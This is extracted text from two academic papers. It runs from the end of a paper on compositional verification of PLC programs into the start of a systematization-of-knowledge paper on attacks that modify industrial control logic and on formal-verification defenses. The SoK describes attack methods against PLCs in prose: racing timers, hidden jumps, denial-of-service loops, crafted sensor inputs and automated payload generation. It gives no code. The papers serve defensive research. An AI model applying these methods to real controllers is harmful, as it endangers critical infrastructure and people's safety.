type of embedded software and has its own characteristics: /g121Most PLC programs are executed in embedded hardware environment. Their logi cal structure is relatively simple. They have short and less kind of statements. /g121A PLC program is written by hardware instructions (or represented by ladder diagrams). So the abstract process of its model is relatively simple. /g121PLC program still has most mechanisms of a high-level programming language. What the verification problems of PLC program need to deal with are similar as traditional program. /g121PLC program is executed in sequence within one scanning cycle, and then next scanning cycle after refreshed output mapping. Inside a scanning cycle, it is similar to sequential programs. In whole scanning peri od, PLC shows as output responses for different input signals. Because cumulative values of various timers or counters are cross a scanning cycle, a PLC program cannot simply think of as logic responses transformed from input to output. Compared PLC program with high-level language programs, its verification is more close to mathematical representation. Therefore, the verification of PLC program has its advantages. The correctness of a PLC pr ogram should have the correctness of dynamic behaviors and static properties from macroscopic or external feat ures. It should also have the correctness of coding and control timing sequence from microcosmic or internal features. The control timing sequence can be divided into that cr oss scanning cycle and within  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:14 UTC from IEEE Xplore. Restrictions apply. scanning cycle. The two sequences influence the dynamic behaviors and the static properties of a PLC program. The research combines the verification technologies on three levels to verify the correctness of PLC program, i.e. for PLC program coding correctness are verified on code level, dynamic behaviors (or cross scanning cycle) on model level and static properties (or within scanning cycle) on statute level. The hierarchy framework for compositional verification of PLC Program is showed as Fig.1. The framework is constructed by mutual complemented technologies including testing, model checking and theorem proving. The research needs easy to be used and realize automatic verification for PLC program. IV. T HE ARCHITECTURE OF THE COMPOSITIONAL VERIFICATION FOR PLC PROGRAM The flow and the constructed key elements of the compositional verification architecture are showed as Fig.2. Generally the obtained PLC program is the code. In order to obtain its model and hig h-level statute, conversion method must be provided from codes on low level to models on high level and statute on top level. Firstly, the formal description of PLC program and the structure of denotational semantics need to study. Because of the variables of register, bit and a series of stack operations, the exte nded definition of /g540-calculus is studied and used to define PLC program. Correctness on code level is required by the code correctness. PLC program is decomposed into different modules on basis of control objects and responses. The compositional testing solves the problem which testing cannot be executed in the real environment. It can reduce testing scale and improve testing coverage. Selected typical test cases are directly performed to find most of the bugs. Because testing method is very much dependent on test cases selection, there will be fail-to-report bugs. To compensate this deficiency, PLC program verification is studied on model and statute level. Correctness on model level is the correctness constraints of software design. From the perspective of software design, most key verification is control timing sequence cross scanning cycle in PLC program. It verifies the correctness of dynamic behaviors while PLC program runs. The design defects and mistakes are found on model level. Because of the existence of register variables in PLC program, the actual state space may be very large on model checking. The state space size is reduced by using combinatorial model checking to avoid "state space explosion" during verification. Model checking is also used to compensate the fail-to -report problems which are caused by insufficient testing coverage. Correctness on statute level is the correctness constraints of PLC program requirements. Its constraint ensures the correctness of design and code for PLC program. The correctness of PLC software within a scanning cycle is verified by theorem proving. Model checki ng can find and report wrong routes by means of segmented or merged scan cycles. The theorem proving verification tests out whether the report is a false report. COQ is a main tool in th e field of theorem proving. It is based on the calculus of inductive constructions, and has the powerful base of mathemati cal model and good expansibility. It has a complete set of tools, a full-time R & D team and supports open source. So the tool is chosen for theorem proving. Three levels technologies verify the correctness of functions and properties of PLC program. From different levels they ensure the correctness of PLC program on verified properties concerned by users. V. M AIN WORK AND ACHIVEMENTS The work focuses on testing and verification for PLC program. It includes the following aspects. In the foundation, the work has proposed the verification architecture and methods of PL C program correctness. In order to ensure that combinatorial testing, model checking and theorem proving have the identical verifying semantics in the architecture, it has abstracted and described the typical PLC working modes, system models, th e syntax and the semantics of PLC program. The mathemati cal description, configuration definition, several operations and related function definitions have been studied for the architecture, which are based on the above framework and the partiti oned structure of PLC program. The formal description, the den otational semantics and Fig.1Hierarchy Framewor k for Compositional Verification of PLC Program Compositional Testin g Denotational Semantics Checking on Code Level PLC program Coding Correc tness Dynamic Behaviors Correctness Combination PLC Pro gram Correctness Focused Properties Correctness Checking on Model Level Checking on Statute Level Compositional Model Checkin g Compositional Theorem Provin g Static Properties Correctness PLC Program Formal Description of PLC Program Denotational Semantics Extended /g540- calculus Testing / Tools Program Partition Testing Agent Combination Code Level Test Cases Component Definition Model Checking / ToolsArithmetic Symbolic Transition System Composition Checking Rules Linear Tem poral Lo gics Model Rules Properties Rules COQ Theorem Provin g ToolVerification Strategies COQ Proving StrategiesProof PropertiesIntuitionalism First-Order Logic Gallina Lan guage Fig.2 The Architecture of the Compo sitional Verification for PLC ProgramProgram Modelling Testing Model Level Model Checking Statute Level Theorem Proving  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:14 UTC from IEEE Xplore. Restrictions apply. functions of PLC program are defined and constructed by extended /g540-calculus used as a tool. The verification technologies on the three levels complement each other with identical basis. On code level, correspon ding to PLC software testing, the work analyzes the applicability of static testing, testing in real environment, hardware checker tes ting, instrumentation test and simulation test. It presents a combinatorial mechanism of software testing framework and te sting method. Based on software components replacing function parts, high-level language code segments and compositional test modules are defined by equivalent denotational semantics and compositional testing strategy. The configuration is described and simulated by software. PLC program testing is converted to the equivalent testing of high level language program segments. The framework and method can make PLC software testing decomposed into seve ral small testing. It solves the testing problems of restoring the real running environment, limit boundary and non-environm ent support. It also improves the testing coverage. On model level, according to the PLC program architecture, formal description and semantics definition, arithmetic symbolic transition system is introduced by means of linear temporal logic syntax and semantics. It solves the problem that basic symbolic transition systems cannot accurately describe the system in practical application. To verify temporal properties of PLC circuit across scanning cycle, variables sets, predicates and migration functions are designed as transformation from a PLC program to a symbolic transition system. Some strategies of model checking are provided for the transition system. A set of the model and the properties of the composite verification rules are defined. They verify the correctness of dynamic behavior wh en PLC program runs, and reduce the verification scale. Th e defined compositional verification rules ensure the accuracy of verification strategies based on mathematical proof. On statute level, the work presents a correctness verification framework based on theorem proving technology for PLC program. The correctness or static properties are verified in one scanning cycle. Based on COQ Gallina language, PLC program is modelled by the inductive conversion of the semantics structure. The denotational semantics is described to prove program properties. The work can deal with the model verification under infinite state space. On application, a pendulum cont rol system is chosen as a typical example and an experiment . PLC output drive module of the pendulum control system is verified by compositional verification method. It is te sted under the boundary limit conditions and non-enviro nment support. Its correctness properties such as system safety, liveness and fairness are verified by model checking and theorem proof under compositional strategies. Experimental results are compared with the general condition and show that the framework has effectiveness and advantage. VI. C ONCLUSION The paper briefly introduces th e compositional verification framework for PLC programs. The specific strategies, rules, function and model in the framework and architecture can be referred to Reference [15]-[17 ]. Although the research on the framework and architecture has obtained some achievements, some works need further to st udy. For example, model checking and theorem proving tools need to develop. The tools should support that PLC prog ramming language such as IL and ladder diagram is automatically converted to models and verification function. They w ill enhance the verification usability. A CKNOWLEDGMENT The authors would like to thank all colleagues who contribute to this study. REFERENCES [1] Lewis R. Programming industrial contr ol systems using IEC 1131-3, volume 50 of Control Engineer ing Series. Stevenage, United Kingdom: The Institution of Electrical Engineers, 1998. [2] B. Kang, et al. A Design and Test Technique for Embedded Software. Proceedings of the 2005 Third ACIS Int'l Conference on Software Engineering Research, Manageme nt and Applications. Michigan: Mount Pleasant, 2005: 160-165. [3] Mertke T, Frey G. Formal Verification of PLC-programs generated from Signal Interpreted Petri Nets. Proceedings of Proceedings of the SMC 2001, Tucson (AZ) USA, 2001: 2700-2705. [4] H. S. Hong, et al. Data flow testing as model checking, The 25th International Conference on Software Engineering. IEEE Computer Society, US: Portland, 2003:232-242. [5] The Spin homepage: http://spinroot.com/spin/whatispin.html. [6] The NuSMV homepage: http://nusmv.irst.itc.it/. [7] The UPPAAL homepage: http://www.uppaal.com/. [8] S. Owre, S. P. Rajan, J. M. Rushby, N. Shankar, M. K. Srivas. PVS: combining specifications, proof checking and model checking. R. Alur and T. A. Henzinger, eds. LNCS: C AV 96, 1996, 1102: 411-414. [9] The COQ toolkit. http://COQ.inria.fr/. [10] R. S. Boyer, J. S. Moore. Proving theorems about lisp functions. Journal of the ACM, 1975, 22(1): 129-144. [11] V. Gourcuff, O. de Smet, J. M. Faure. Improving large-sized PLC programs verification using abstractions. Proceedings of the 17th World Congress on The International Federation of Automatic Control, Seoul, Korea, July, 2008: 5101-5106. [12] Bastian Schlich Jorg Brauer Jorg Wernerus Stefan Kowalewski. Direct Model-checking of PLC Programs in IL. Proceedings of 2nd IFAC Workshop on Dependable Control of Discrete Systems. cole Normale Sup rieure de Cachan, Italy, 2009: Vol2(1). [13] P.Maier. A Lattice-Theoretic Framework For Circular Assume- Guarantee Reasoning [PhD thesis ]. Saarbryucken: University at des Saarlandes, 2003. [14] Jan Olaf Blech, Sidi Ould Biha. Verification of PLC properties based on formal semantics in Coq. Proceedings of the 9th international conference on Software engineering and formal me thods (SEFM'11). Springer- Verlag Berlin, Heidelberg, 2011: 58-73. [15] Xiao Litian, Gu M, Sun Jiaguang. The Denotational Semantics Definition of PLC Programs Based on Extended -Calculus. Communications in Computer and Information Science, 2011, 176(II): 40-46. [16] Litian Xiao, Rui Wang, Ming Gu, Jiaguang Sun. Semantic characterization of programmable logic controller programs. Mathematical and Computer Modelling, 2012, 55(5-6): 1819- 1824. [17] Xiao Litian, Gu Ming, Sun Jiaguang. The Verification of PLC Program Based on Interactive Theorem Proving Tool COQ. Proceedings of 4th IEEE International Conference on Computer Science and Information Technology(ICCSIT2011) Chengdu, China, pp.374-378, June, 2011.  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:14 UTC from IEEE Xplore. Restrictions apply.
SoK_Attacks_on_Industrial_Control_Logic_and_Formal_Verification-Based_Defenses.pdf
Programmable Logic Controllers (PLCs) play a critical role in the industrial control systems. Vulnerabilities in PLC programs might lead to attacks causing devastatingconsequences to the critical infrastructure, as shown inStuxnet and similar attacks. In recent years, we have seenan exponential increase in vulnerabilities reported for PLCcontrol logic. Looking back on past research, we foundextensive studies explored control logic modi cation attacks,as well as formal veri cation-based security solutions. We performed systematization on these studies, and found attacks that can compromise a full chain of controland evade detection. However, the majority of the formalveri cation research investigated ad-hoc techniques targetingPLC programs. We discovered challenges in every aspectof formal veri cation, rising from (1) the ever-expandingattack surface from evolved system design, (2) the real-timeconstraint during the program execution, and (3) the barrierin security evaluation given proprietary and vendor-speci cdependencies on different techniques. Based on the knowl-edge systematization, we provide a set of recommendationsfor future research directions, and we highlight the need ofdefending security issues besides safety issues.
SoK: Attacks on Industrial Control Logic and Formal Veri cation-Based Defenses Ruimin Sun Northeastern University r [email protected] Mera Northeastern University [email protected] Lu Northeastern University [email protected] Choffnes Northeastern University [email protected] Index Terms PLC, attack, formal veri cation 1. Introduction Industrial control systems (ICS) are subject to attacks sabotaging the physical processes, as shown in Stuxnet [33], Havex [46], TRITON [31], Black Energy [8], andthe German Steel Mill [63]. PLCs are the last line incontrolling and defending for these critical ICS systems. However, in our analysis of Common Vulnerabilities and Exposures (CVE)s related to control logic, we haveseen a fast growth of vulnerabilities in recent years [86].These vulnerabilities are distributed across vendors anddomains, and their severeness remains high. A closer lookat these vulnerabilities reveals that the weaknesses behindthem are not novel. As Figure 1shows, multiple weak- nesses are repeating across different industrial domains,such as stack-based buffer over ow and improper inputvalidation. We want to understand how these weaknesseshave been used in different attacks, and how existingsolutions defend against the attacks. Among various attacks, control logic modi cation at- tacks cause the most critical damages. Such attacks lever-age the aws in the PLC program to produce undesiredstates. As a principled approach detecting aws in pro-grams, formal veri cation has long been used to defend Figure 1: The reported common weaknesses and the af-fected industrial sectors. The notation denotes the numberof CVEs. control logic modi cation attacks [24], [26]. It bene ts from several advantages that other security solutions failto provide. First, PLCs have to strictly meet the real-time constraints in controlling the physical processes. Thismakes it impractical for heavyweight solutions to performa large amount of dynamic analysis. Second, the physicalprocesses are often safety-critical, meaning false posi-tives are intolerable. Formal veri cation is lightweight,accurate, and suitable for graphical languages, which arecommonly used to develop PLC programs. Over the years, there have been extensive studies investigating control logic modi cation attacks, and for-mal veri cation-based defenses. To understand the currentresearch progress in these areas, and to identify openproblems for future research directions, we performed asystematization of current studies. Scope of the paper. We considered studies presenting control logic modi cation attacks through modifying pro-gram payload (i.e. program code), or feeding special inputdata to trigger program design aws. We also consideredstudies presenting formal veri cation techniques to protectthe affected programs, including behavior modeling, statereduction, speci cation generation, and veri cation. For-mal veri cation of network protocols is out of the scopeof the paper. We selected the literature based on three cri-teria: (1) the study investigates control logic modi cationattacks or formal veri cation-based defenses, (2) the studyis impactful considering its number of citations, or (3) thestudy discovers a new direction for future research. Systematization methodology. Our systematization was based on the following aspects. We use attack todenote control logic modi cation, and defense to denoteformal veri cation-based defense. Threat model: this refers to the requirements and 3852021 IEEE European Symposium on Security and Privacy (EuroS&P) 2021, Ruimin Sun. Under license to IEEE. DOI 10.1109/EuroSP51992.2021.000342021 IEEE European Symposium on Security and Privacy (EuroS&P) | 978-1-6654-1491-3/21/$31.00 2021 IEEE | DOI: 10.1109/EUROSP51992.2021.00034 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. assumptions to perform the attacks/defenses. Security goal: this refers to the security properties affected by attacks/defenses. Weakness: this refers to the aw triggered to performthe attacks. Detection to evade: this refers to the detection thatfails to capture the attacks. Challenge: this refers to the challenges in defendingthe attacks the advance of attacks, and the insuf -ciency of defenses. Defense focus: this refers to the speci c researchtopic in formal veri cation, e.g. behavior modeling,state reduction, speci cation generation, and formalveri cation. We found that control logic modi cation attacks could happen under every threat model and considered variousevasive techniques. The attacks have been fast evolvingwith the system design, through input channels from thesensors, the engineering stations, and other connectedPLCs. The attacks could also evade dynamic state es-timations and veri cation techniques through leveragingimplicitly speci ed properties. Multiple attacks [54], [64],[83] even deceived engineering stations with fake behav-iors. We also found that applying formal veri cation has made great progress in improving code quality [97].However, the majority of the studies investigated ad-hoc formal veri cation research targeting PLC programs.These studies face challenges in many aspects of formalveri cation, during program modeling, state reduction,speci cation generation, and veri cation. We found manystudies manually de ne domain-speci c safety properties,and verify them based on a few simple test cases. Despitethe limitation of test cases, the implicitness of propertieswas not well explored, even though such properties havebeen used to conduct input manipulation attacks [68] [70]. Besides implicit properties, speci cation generationhas seen challenges in catching up with program model-ing, to support semantics and rules from new attack sur-faces. In addition, the real-time constraint limited runtimeveri cation in supporting temporal features, event-drivenfeatures, and multitasks. The dependency on proprietaryand vendor-speci c techniques resulted in ad-hoc studies.The lack of open source tools impeded thorough evalu-ation across models, frameworks, and real programs inindustry complexity. As a call for solutions to address these challenges, we highlight the need of defending security issues besidessafety issues, and we provide a set of recommendations forfuture research directions. We recommend future researchto pay attention to plant modeling and to defend againstinput manipulation attacks. We recommend the collabora-tion between state reduction and stealthy attack detection.We highlight the need for automatic generation of domain-speci c and incremental speci cations. We also encouragemore exploration in real-time veri cation, together withmore support in open-source tools, and thorough perfor-mance and security evaluation. Our study makes the following contributions: Systematization of control logic modi cation attacksand formal veri cation-based defenses in the lastthirty years. Figure 2: The architecture of a PLC. Identifying the challenges in defending control logicmodi cation attacks, and barriers existed in currentformal veri cation research. Pointing out future research directions. The rest of the paper is organized as follows. Section 2brie y describes the background knowledge of PLCs and formal veri cation. Section 3describes the motivation of this work and the methodology of the systematization.Section 4and Section 5systematize existing studies on control logic modi cation attacks, and formal veri cation-based defenses categorized on threat models and the ap-proaches to perform the attack/defense. Section 6provides recommendations for future research directions to counterexisting challenges. Section 7concludes the paper. 2. Background 2.1. PLC Program 2.1.1. Programming languages. IEC-61131 [87] de ned ve types of languages for PLC source code: Ladder diagram (LD), Structured text (ST), Function block diagram (FBD), Sequential function chart (SFC), Instruction list (IL). Among them, LD, FBD, and SFC are graph-based languages. IL was deprecated in 2013. PLC programsare developed in engineering stations, which provide standard-compliant or vendor-speci c Integrated Devel-opment Environments (IDEs) and compilers. Some high-end PLCs also support computer-compatible languages(e.g., C, BASIC, and assembly), special high-level lan- guages (e.g., Siemens GRAPH5 [2]), and boolean logic languages [67]. 2.1.2. Program bytecode/binary. An engineering sta- tion may compile source code to bytecode or binary depending on the type of a PLC. For example, SiemensS7 compiles source code to proprietary MC7 bytecodeand uses PLC runtime to interpret the bytecode, whileCODESYS compiles source code to binaries (i.e. nativemachine code) [55]. Unlike conventional software thatfollows well-documented formats, such as Executable andLinkable Format (ELF) for Linux and Portable Executable(PE) for Windows, the format of PLC binaries is oftenproprietary and unknown. Therefore, further explorationrequires reverse engineering. 2.1.3. Scan cycle. Unlike conventional software, a PLC program executes by in nitely repeating a scan cycle that 386 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. consists of three steps (as Figure 2shows). First, the input scan reads the inputs from the connected sensors and saves them to a data table. Then, the logic execution feeds the input data to the program and executes the logic. Finally, the output scan produces the output to the physical processes based on the execution result. The scan cycle must comply with strict prede ned timing constraints to enforce the real-time execution. TheI/O operations are the critical part in meeting the cycletime. 2.1.4. Hardware support. PLCs adopt a hierarchical memory, with prede ned addressing scheme associated with physical hardware locations. PLC vendors maychoose different schemes for I/O addressing, memoryorganization, and instruction sets, making it hard for thesame code to be compatible across vendors, or evenmodels within the same vendor. 2.2. PLC program security PLCs interact with a broad set of components, as Figure 3shows. They are connected to sensors and ac- tuators to interact with and control the physical world.They are connected to supervisory human interfaces (e.g.the engineering station) to update the program and receiveoperator commands. They may also be interconnected in asubnet. These interactions expose PLCs to various attacks.For example, communication between the engineeringstation and the PLC may be insecure, the sensors might becompromised, and the PLC rmware can be vulnerable. 2.2.1. Control logic modi cation. Our study considers control logic modi cation attacks, which we de ne as attacks that can change the behavior of PLC control logic.Control logic modi cation attacks can be achieved throughprogram payload/code modi cation and/or program input manipulation. The payload modi cation can be applied toprogram source code, bytecode or binary (Section 2.1). The input manipulation can craft input data to exploitexisted design aws in the program to produce undesiredstates. The input may come from any interacting compo-nents showed in Figure 3. Defending against these attacks is challenging. As we mentioned earlier, PLCs have to strictly maintain the scancycle time to control the physical world in real-time.This requirement overweights security solutions requir-ing a large amount of dynamic analysis. Moreover, thesecurity solution has to be accurate, since the controlledphysical processes are critical in the industry, making falsepositives less tolerable. 2.2.2. Formal veri cation. Formal veri cation is a lightweight and accurate defense solution, which is often tailored for graphical languages. This makes it suitable todefend against control logic modi cation attacks. Formal veri cation is a method that proves or dis- proves if a program/algorithm meets its speci cations ordesired properties based on a certain form of logic [32].The speci cation may contain security requirements andsafety requirements. Commonly used mathematical mod-els to do formal veri cation include nite state machines,labeled transition systems, vector addition systems, Petrinets, timed automata, hybrid automata, process algebra,and formal semantics of programming languages, e.g.operational semantics, denotational semantics, axiomaticsemantics, and Hoare logic. In general, there are twotypes of formal analysis: model checking and theoremproving [45]. Model checking uses temporal logic todescribe speci cations, and ef cient search methods tocheck whether the speci cations hold for a given system.Theorem proving describes the system with a series oflogical formulae. It proves the formulae implying theproperty via deduction with inference rules provided bythe logical system. It usually requires more backgroundknowledge and nontrivial manual efforts. We will describethe commonly used frameworks and tools for formalveri cation in later sections. An extended background in Appendix Aprovides an example of an ST program controlling the traf c lights ina road intersection, an example of an input manipulationattack, and the process of using formal veri cation todetect and prevent it. 3. Motivation and Methodology In this section, we rst explain our focus on control logic modi cation attacks and formal veri cation-basedprotection. Then, we use an example to introduce oursystematization methodology. 3.1. Motivation We focus on control logic modi cation due to its criti- cal impact on the PLC industry. Control logic modi cationcovers attacks from program payload (i.e. program code)modi cation to data input manipulation. These attacksresult from frequently reported vulnerabilities, and alsocause unsafe behaviors to the critical industrial infrastruc-ture, as Figure 1shows. To mitigate control logic modi cation attacks, exten- sive studies have been performed using formal methodson PLC programs. Formal methods have demonstrateduniqueness and practicality to the PLC industry. For ex-ample, Beckhoff TwinCat 3 and Nuclear DevelopmentEnvironment 2.0 have integrated safety veri cation dur-ing PLC program implementation [56]. Formal methodshave also been used in the PLC programs controllingOntario Power Generation, and Darlington Nuclear PowerGenerating Station [76]. Nevertheless, we found existingresearch to be ad-hoc, and the area is still new to thesecurity community. We believe our systematization canbene t the community with recommendations for futureresearch directions. Besides formal methods, there are additional defense techniques. At the design level, one can use encryptednetwork communication, private sensor inputs, and isolatedifferent functionalities of the engineering station. Theseprotections are orthogonal to formal methods and commonfor any type of software/architecture. In addition, onecan leverage intrusion detection techniques with dynamicanalysis. Such analysis often involves complex algorithms,such as machine learning or neural networks, which re-quire extensive runtime memory, and may introduce falsepositives. However, PLCs have limited memory and are 387 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply.                  Figure 3: A PLC controlling traf c light signals. less tolerant to false positives, given the controlled physi- cal processes can be safety-critical. Thus, intrusion detec-tion for PLC programs are less practical than for regularsoftware. To improve PLC security, formal methods cancooperate with these techniques. 3.2. Methodology 3.2.1. Motivating Example. Figure 3shows a motivating example with a PLC controlling traf c light signals at anintersection. In step 1/circlecopyrt, a PLC program developer pro- grams the control logic code in one of the ve languagesdescribed in Section 2.1.1, in an engineering station (e.g. located in the transportation department). The engineeringstation compiles the code into bytecode or binary basedon the type of the PLC. Then in step 2/circlecopyrt, the compiled bytecode/binary will be transmitted to the PLC located at aroad intersection through network communication. In step 3/circlecopyrt, the bytecode/binary will run in the PLC, by using the input from sensors (e.g. whether a pedestrian presses thebutton to cross the intersection), and producing output tocontrol the physical processes (i.e. turning on/off a greenlight). The duration of lights will depend on whether apedestrian presses the button to cross. Within each step, vulnerabilities can exist which al- low attackers to affect the behavior of the control logic.The following describes the threat model assumptions forattackers to perform control logic modi cation attacks. 3.2.2. Threat Model Assumptions. T1: In this threat model, attackers assume accesses to the program source code, developed in one of the languages described inSection 2.1.1. Attackers generate attacks by directly mod- ifying the source code. Such attacks happen in the en-gineering station as step 1/circlecopyrtin Figure 3. Attackers can be internal staffs who have accesses to the engineeringstation, or can leverage vulnerabilities of the engineeringstation [1], [50], [51] to access it. T2: In this threat model, attackers have no access to program source code but can access program bytecode or binary. Attackers generate attacks by rst reverse en-gineering the program bytecode/binary, then modifyingthe decompiled code, and nally recompiling it. Suchattacks happen during the bytecode/binary transmissionfrom the engineering station to the PLC ( 2/circlecopyrtin Figure 3). Attackers can intercept and modify the transmissionleveraging vulnerabilities in the network communication[48], [49], [52]. T3: In this threat model, attackers have no access to program source code nor bytecode/binary. Instead, attack-ers can guess/speculate the logic of the control programby accessing the program runtime environment, including the PLC rmware, hardware, or/and Input and Outputtraces. Attackers can modify the real-time sensor input tothe program ( 3/circlecopyrtin Figure 3). Such attacks are practical since within the same domain, the general settings of theinfrastructure layout are similar, and infrastructures (e.g.traf c lights) can be publicly accessible [3], [43], [69]. 3.2.3. Weaknesses. Attackers usually leverage existing program weaknesses for control logic modi cation. The following enumerates the weaknesses.W1: Multiple assignments for output variables. Race con-dition can happen when an output variable depends onmultiple timers or counters. Since one timer may runfaster or slower than the other, at a certain moment, theoutput variable will produce a non-deterministic value. Inthe traf c light example, this may cause the green lightto be on and off in a short time, or two lights to be onsimultaneously.W2: Uninitialized or unused variables. An uninitializedvariable will be given the default value in a PLC program.If an input variable is uninitialized, attackers can provideillegal values for it during runtime. Similarly, attackerscan leverage unused output variables to send private in-formation.W3: Hidden jumpers. Such jumpers will usually bypass aportion of the program, and are only triggered on a certain(attacker-controlled) condition. The attackers can embedmalware in the bypassed portion of the program.W4: Improper runtime input. Attackers can craft illegalinput values based on the types of the input variables tocause unsafe behavior. For example, attackers can providean input index that is out-of-the-bound of an array.W5: Prede ned memory layout of the PLC hardware. PLCaddressing usually follows the format [6] of a storageclass (e.g. Ifor input, Qfor output), a data size (e.g. XforBOOL ,WforWORD ), and a hierarchical address indicating the location of the physical port. Attackerscan leverage the format to speculate the variables duringruntime.W6: Real-time constraints. The scan cycle has to strictlyfollow a maximum cycle time to enforce the real-timeexecution. In non-preemptive multitask programs, one taskhas to wait for the completion of another task beforestarting the next scan cycle. To generate synchronizationattacks, attackers can create loops or introduce a largenumber of I/O operations to extend the execution time. Among the weaknesses, attackers need accurate pro- gram information to exploit W1, W2, and W3. Therefore, these attacks usually happen in T1. To disguise the mod- i cation to the source code, attackers in T1can include these weaknesses as bad coding practice, without affectingthe major control logic. The other weaknesses are usuallyexploited in T2and T3. 3.2.4. Security Goals. The security goals of existing studies are related to the security properties of CIA:con dentiality, integrity, and availability.GC: Con dentiality. The attacks violate con dentiality by stealthily monitoring the execution of PLC programsleveraging existing weaknesses (e.g. W2, W3). Formalveri cation approaches defend accordingly.GI: Integrity. The attacks violate integrity by causing PLC programs to produce states that are unsafe for thephysical process (e.g. plant), for example, over owing a 388 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. water tank, or uctuating power generation [11], [58], [85]. Formal veri cation approaches defend by verify-ing (i) generic properties that are process-independent, and (ii) domain-speci c properties that consider the plant model. Due to the amount of studies targeting GI, wefurther split GI into generic payload modi cation (GI 1) without program I/O nor plant settings, generic input ma-nipulation (GI 2) with program I/O, domain-speci c pay- load modi cation (GI 3) with plant settings, and domain- speci c input manipulation ( GI 4) with program I/O and plant settings. GA: Availability.: The attacks violate availability by ex- hausting PLC resources (memory or processing power)and causing a denial-of-service. Formal veri cation ap-proaches defend accordingly. 4. Systematization of Attacks This section systematizes PLC attack methodologies under the categorization of threat models. Within eachcategory, we discuss the goals of the attacks and theunderlying weaknesses. We also summarize the challengesof attack mitigation. 4.1. Attack Methodologies Given the exposed threat models, the following section describes the attack methodologies of existing studiesaccording to the security goals. Table 1summarizes these studies. 4.1.1. T1: program source code. At the source code level, the code injection or modi cation has to be stealthy, in a way that no observable changes would be introducedto the major functionality of the program, or masked asnovice programmer mistakes. In other words, the attackscould be disguised as unintentional bad coding practices. Existing studies [84], [88] mainly discussed attacks on graphical languages, e.g. LD, because small changes onsuch programs could not be easily noticed. Serhane et.al [84] focused on the weak points on LD programs that could be exploited by malicious attacks.Targeting G1to cause unsafe behaviors, attackers could generate uncertainly uctuating output variables, for ex-ample, intentionally introducing two timers to control thesame output variable, could lead to a race condition. Thiscould damage devices, similar to Stuxnet [33], but unpre-dictably. Attackers could also bypass certain functions,manually force the values of certain operands, or applyempty branches or jumps. Targeting G2to stay stealthy while spying the pro- gram, attackers could use array instructions or user-de ned instructions, to log critical parameters and values.Targeting G3to generate DoS attacks, attackers could apply an in nite loop via jumps, and use nest timers andjumps to only trigger the attack at a certain time. Thisattack could slow down or crash the PLC in a severematter. Because PLC programmers often leave unused vari- ables and operands, both the spying program and the DoSprogram could leverage unused programming resources. These attacks leveraged weaknesses W1-W4, and fo- cused on single ladder program. To extend the attacks tomulti-ladder programs, Valentine et.al [88] further pre- sented attacks that could install a jump to a subroutinecommand, and modify the interaction between two ormore ladders in a program. This could be disguised asan erroneous use of scope and linkage by a novice pro-grammer. In addition to code injection and modi cation, McLaughlin et.al [69] presented input manipulation at- tacks to cause unsafe behaviors. This study analyzed thecode to obtain the relationship between the input andoutput variables and deducted the desired range for outputvariables. Attackers can craft inputs that could lead toundesired outputs for the program. The crafted inputs haveto evade the state estimation detection of the PLC. Sincethe input manipulation happens in T3, and more studies discussed input manipulation attacks without using sourcecode, we will elaborate on these attacks in T3. 4.1.2. T2: program bytecode/binary. Studies at this threat model mainly investigated program reverse engi-neering, and program modi cation attacks. Instead ofdisguising as bad coding practices, like those in T1, the injection at the program binary aimed at evading behaviordetectors. To design an attack prototype, McLaughlin et.al [70] tested on a train interlocking program. The program wasreverse engineered using a format library. With the decom-piled program, they extracted the eldbus ID that indicatedthe PLC vendor and model, and then obtained cluesabout the process structure and operations. To generateunsafe behaviors, such as causing con ict states for thetrain signals, they targeted timing-sensitive signals andswitches. To evade safety property detection, they adoptedan existed solution [34] to nd the implicit properties ofthe behavior detectors. For example, variable rdepends on pandq, so a property may de ne the relationship between pandq, as a method to protect r. However, attackers can directly change the value of rwithout affecting pandq, and the change will not alarm the detector. In this way,they automatically searched for all the Boolean equations,and could generate malicious payloads based on that. Based on this prototype, SABOT [68] was imple- mented. SABOT required a high-level description of thephysical process, for example, the plant contains twoingredient valves and one drain valve . Such informationcould be acquired from public channels, and are similarfor processes in the same industrial sector. With thisinformation, SABOT generated a behavioral speci cationfor the physical processes and used incremental modelchecking to search for a mapping between a variablewithin the program, and a speci ed physical process.Using this map, SABOT compiled a dynamic payloadcustomized for the physical process. Both studies were limited to Siemens devices, with- out revealing many details on reverse engineering. Toprovide more information, and support CodeSys-basedprograms, Keliris et.al [55] implemented an open-source decompiler, ICSREF, which could automatically reverseengineer CodeSys-based programs, and generate mali-cious payloads. ICSREF targeted PID controller functionsand manipulated the parameters such as the setpoints,proportional/integral/derivative gains, initial values, etc.ICSREF inferred the physical characteristics of the con- 389 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. TABLE 1: The studies investigating control logic modi cation attacks. Thr eat ModelPaper WeaknessSecurity GoalAttack TypeDetection toEvadeNetw ork AccessPLC Language/T ypeTools Serhane 18 [84] W1,2,3 GI1,GC,GA both Programmer ES LD, RSLogix N/A Valentine 13 [88] W1,2,3,6 GI1,GC passi ve Programmer N/A LD PLC-SF , vul. assessmentT1 sourcecode McLaughlin 11 [70] W4 GI3 both State verif. ES generic N/A ICSREF [55] W4 GI3 passi ve NA ES,PLC Codesys-based angr, ICSREF SABO T[68] W4 GI3 passi ve N/A ES,PLC IL NuSMVT2bytecode/binary McLaughlin 11 [70] W4 GI3 both State verif. ES,PLC generic N/A PLCInject [58] W5 GC both N/A ES,PLC IL,Siemens PLCInject malware PLC-Blaster [85] W5 GC,GA active N/A ES,Sensor, PLC Siemens PLC-Blaster worm Senthi vel 18 [83] W4 GI1 active ES ES,PLC LD, AB/RsLogix PyShark, decompiler Laddis CLIK [54] W4 GI1 both ES PLC IL,Schneider Eupheus decompilation Beresford 11 [11] W4,5 GI2 both N/A ES,PLC Siemens S7 Wireshark, Metasploit Lim 17 [64] W4,5 GI4,GA active ES ES,PLC Tricon PLC LabV iew, PXI 